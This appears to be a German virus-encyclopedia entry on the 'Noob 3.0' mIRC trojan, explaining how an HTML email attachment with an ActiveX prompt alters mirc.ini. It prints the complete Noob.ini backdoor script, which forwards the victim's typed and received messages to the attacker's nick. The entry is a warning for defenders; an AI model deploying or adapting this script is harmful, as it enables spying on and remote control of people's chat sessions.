Noob 3.0
Dieser Trojaner verbreitet sich mittels eines HTML-Dokumentes, welches in den meissten Fällen eine animierte Grafik beinhaltet. Die modifizierte HTML-Datei wird häufig als E-Mail Dateianhang verschickt. Es handelt sich um einen sogenannten Mirc Trojaner (Mirc ist ein Chat-Programm, welches den Zugriff auf IRC-Channels ermöglicht).

Führt der Anwender die angehängte HTML-Datei aus, so wird das Dokument sehr wohl angezeigt, jedoch erscheint dazu eine Abfrage, ob ein ActiveX-Control ausgeführt werden soll. Sollte der Anwender die Abfrage bestätigen initialisiert sich die animierte Grafik, während heimlich nach dem Chat-Programm Mirc gesucht wird. Führt die Suche zum Erfolg, wird eine Eintragung in der Mirc.ini Datei vorgenommen:

    [Perform]
    n0=/Remote ON

Eine Voraussetzung ist jedoch die Tatsache, dass sich das Mirc-Programm bzw. das entsprechende Verzeichnis auf dem Laufwerk C befinden muss. Wurde das Chat-Programm auf einem anderen Laufwerk installiert (z.B. "D") kann Noob 3.0 sich nicht installieren. Desweiteren "muss" der Browser Internet Explorer ab Version 4.0 auf dem System installiert sein.
Dazu wird eine Noob.ini im gleichen Verzeichnis angelegt, wo sich auch das Mirc-Programm befindet. Der Inhalt der Noob.ini lautet:

    [script]
    n0=ctcp 1:Gravity3:*:{
    n1= //set %3pty $nick
    n2= //raw -q privmsg %3pty : Noob active.
    n3= //halt
    n4=}
    n5=
    n6=ctcp 1:gone:*:{
    n7= //raw -q privmsg %3pty : Deactivating Noob.
    n8= //set %3pty $null
    n9= //halt
    n10=}
    n11=
    n12=ctcp 1:*:*:{
    n13= if ( $nick == %3pty ) {
    n14= *1
    n15= /halt
    n16= }
    n17=}
    n18=
    n19=on 1:INPUT:*:{
    n20= if (%3pty != $null) //raw -q privmsg %3pty : - $me to $active - *1
    n21=}
    n22=
    n23=on 1:TEXT:*:?:{
    n24= if (%3pty != $null) //raw -q privmsg %3pty : - $nick to $me - *1
    n25=}
    n26=
    n27=raw *:*No such nick/channel*:/halt

Nachdem die "Installation" abgeschlossen wurde, wird dieser "Erfolg" dem "Hacker" während der nächsten Chatsitzung übermittelt.

Der "Hacker" kann von aussen das gesamte Mirc-Programm seines Opfers steuern. Dazu gehört unter anderem auch das Auslesen des Passwortes mit Nutzernamen, sowie Down- und Upload von Dateien.

Kommentar:
Da der IRC durch sehr viele Internetanwender genutz wird und das Chatprogramm "Mirc" dazu schon fast zum Standart geworden ist, kann hier durchaus eine hohe Verbreitung gegeben sein.
Dazu kommt noch die Tatsache, dass die Regel "nur Exe-Dateien enthalten Trojaner bzw. destruktiven Code" schon lange nicht mehr gilt.


Fenster schliessen